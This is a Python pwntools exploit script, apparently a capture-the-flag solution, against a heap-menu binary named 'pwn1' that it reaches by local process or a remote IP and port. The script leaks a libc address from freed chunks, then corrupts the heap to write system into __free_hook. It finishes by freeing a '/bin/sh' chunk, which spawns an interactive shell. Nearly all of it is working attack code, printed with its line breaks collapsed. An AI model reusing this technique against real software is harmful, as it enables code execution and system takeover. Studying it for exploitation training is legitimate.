1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74
| from pwn import *
if args['REMOTE']: p = remote('119.61.19.212', 8087) else: p = process('./pwn1') elf = ELF('./pwn1') libc = elf.libc
def add(index, content): p.sendlineafter('3.run\n', '1') p.sendlineafter('index:', str(index)) p.sendlineafter('content:', content) def delete(index): p.sendlineafter('3.run\n', '2') p.sendlineafter('index:\n', str(index)) def run(index, key): p.sendlineafter('3.run\n', '3') p.sendlineafter('index:\n', str(index)) p.sendlineafter('input key:', str(key)) delete(index) add(0, 'aaaa') add(1, 'aaaa') add(2, 'bbbb') add(3, 'cccc') add(4, 'aaaa') add(5, 'aaaa') add(6, 'bbbb') add(7, 'cccc') add(8, 'padding')
delete(0) delete(1) delete(2) delete(3) delete(4) delete(5) delete(6)
run(7, 0) p.recvuntil('3.run\n') leak = u64(p.recvn(6).ljust(8, '\0')) log.success('leak : ' + hex(leak)) libc.address = leak - 0x3ebca0 log.success('libc : ' + hex(libc.address))
p.sendline('1') p.sendlineafter('index:', str(0)) p.sendlineafter('content:', '00000')
add(1, '/bin/sh\0') add(2, 'bbbb') add(3, 'cccc') add(4, 'aaaa') add(5, 'aaaa') add(6, 'bbbb')
free_hook = libc.symbols['__free_hook'] system = libc.symbols['system']
run(0, free_hook)
sleep(3) add(9, '?') add(10, p64(system)) delete(1) p.interactive()
|